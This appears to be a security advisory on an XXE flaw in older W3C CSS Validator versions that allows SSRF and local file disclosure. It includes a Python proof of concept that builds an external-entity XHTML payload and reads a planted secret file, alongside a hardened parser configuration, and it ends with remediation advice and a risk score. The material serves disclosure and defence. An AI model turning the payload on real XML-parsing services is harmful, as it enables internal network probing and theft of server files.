W3C CSS Validator XXE Vulnerability Leading to SSRF and Potential LFI

Vulnerability

W3C CSS Validator versions prior to cssval-20250226 process XML External Entities (XXE) in the documents they are asked to validate. An attacker who submits a document carrying an external entity declaration can make the validator's server fetch attacker-chosen URIs, including internal ones, which amounts to server-side request forgery (SSRF). On some deployments the same flaw can also be used to read arbitrary local files: if the content of a resolved entity is reflected back to the attacker, for example inside an exception message produced while parsing it, the file contents are disclosed.

Impact

Exploitation of this vulnerability allows server-side request forgery (SSRF) from the validator host, and under the conditions described above (entity content reaching the attacker through exception messages) disclosure of arbitrary local files readable by the validator process.

Reproduction

The vulnerability can be reproduced by submitting a crafted XML document whose DOCTYPE declares an external entity (an entity with a SYSTEM identifier pointing at a URI of the attacker's choice) and whose body references that entity. When the validator parses the document it resolves the entity and fetches the URI. Both the W3C CSS Validator web application and the library, when embedded in another application, are affected.
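The following is an added example, not code from the advisory or from the W3C CSS Validator project. It models the two parser behaviours the advisory contrasts, using Python's standard library SAX parser instead of the validator's Java parser, and assumes (as the advisory implies) that the validator hands a submitted XHTML document to an XML parser that will resolve external general entities. The payload shape, the `<style>` element as the place where the entity is referenced, and the secret file are all constructed for the demonstration; a `file://` URI is used so the example runs offline, but the same entity declaration with an `http://` URI is what produces the SSRF.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax import handler


def build_xxe_payload(target_uri: str) -> bytes:
    """Construct an XHTML document of the kind a CSS validator accepts, with a
    DOCTYPE that declares an external general entity pointing at target_uri.

    The entity is referenced inside <style>, so whatever the parser fetches is
    delivered to the application as CSS text (constructed example payload)."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE html [\n"
        f'  <!ENTITY xxe SYSTEM "{target_uri}">\n'
        "]>\n"
        '<html xmlns="http://www.w3.org/1999/xhtml">\n'
        '  <head><style type="text/css">&xxe;</style></head>\n'
        "  <body/>\n"
        "</html>\n"
    ).encode()


class _StyleCollector(handler.ContentHandler):
    """Collects the character data the parser delivers for <style>."""

    def __init__(self):
        super().__init__()
        self.in_style = False
        self.chunks = []

    def startElement(self, name, attrs):
        if name == "style":
            self.in_style = True

    def endElement(self, name):
        if name == "style":
            self.in_style = False

    def characters(self, content):
        if self.in_style:
            self.chunks.append(content)


def parse_style_text(document: bytes, resolve_external_entities: bool) -> str:
    """Parse the document and return the text seen inside <style>.

    resolve_external_entities=True is the vulnerable configuration: the parser
    opens the entity's SYSTEM URI (file://, http://, ...) and splices the
    response into the document. False is the hardened configuration: the
    reference is skipped and no fetch happens."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    collector = _StyleCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(document))
    return "".join(collector.chunks)


def demo() -> dict:
    """Run the same payload through both configurations against a secret file
    created for the demonstration (assumes a POSIX path usable in a file:// URI)."""
    with tempfile.NamedTemporaryFile("w", delete=False, suffix=".txt") as f:
        f.write("db_password=hunter2")  # constructed secret
        secret_path = f.name
    try:
        payload = build_xxe_payload("file://" + secret_path)
        return {
            "vulnerable": parse_style_text(payload, resolve_external_entities=True),
            "hardened": parse_style_text(payload, resolve_external_entities=False),
        }
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    print(demo())
```

In the vulnerable run the file contents come back as the style text, which is exactly the data an error-reporting path can then echo to the attacker; in the hardened run the entity reference yields nothing and no URI is opened. For a Java SAX or DOM parser the equivalent hardening is to disable the `http://xml.org/sax/features/external-general-entities` feature (and, where no DTD is needed, set `http://apache.org/xml/features/disallow-doctype-decl` to true); this is general parser guidance, not a description of the project's own fix.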

Remediation

Update to W3C CSS Validator version cssval-20250226 or later, which addresses this vulnerability.

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 2.5
exploitability: 8.7
remediation: 0.0
relevance: 0.0
threat: 6.4
urgency: 2.9
incentive: 5.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.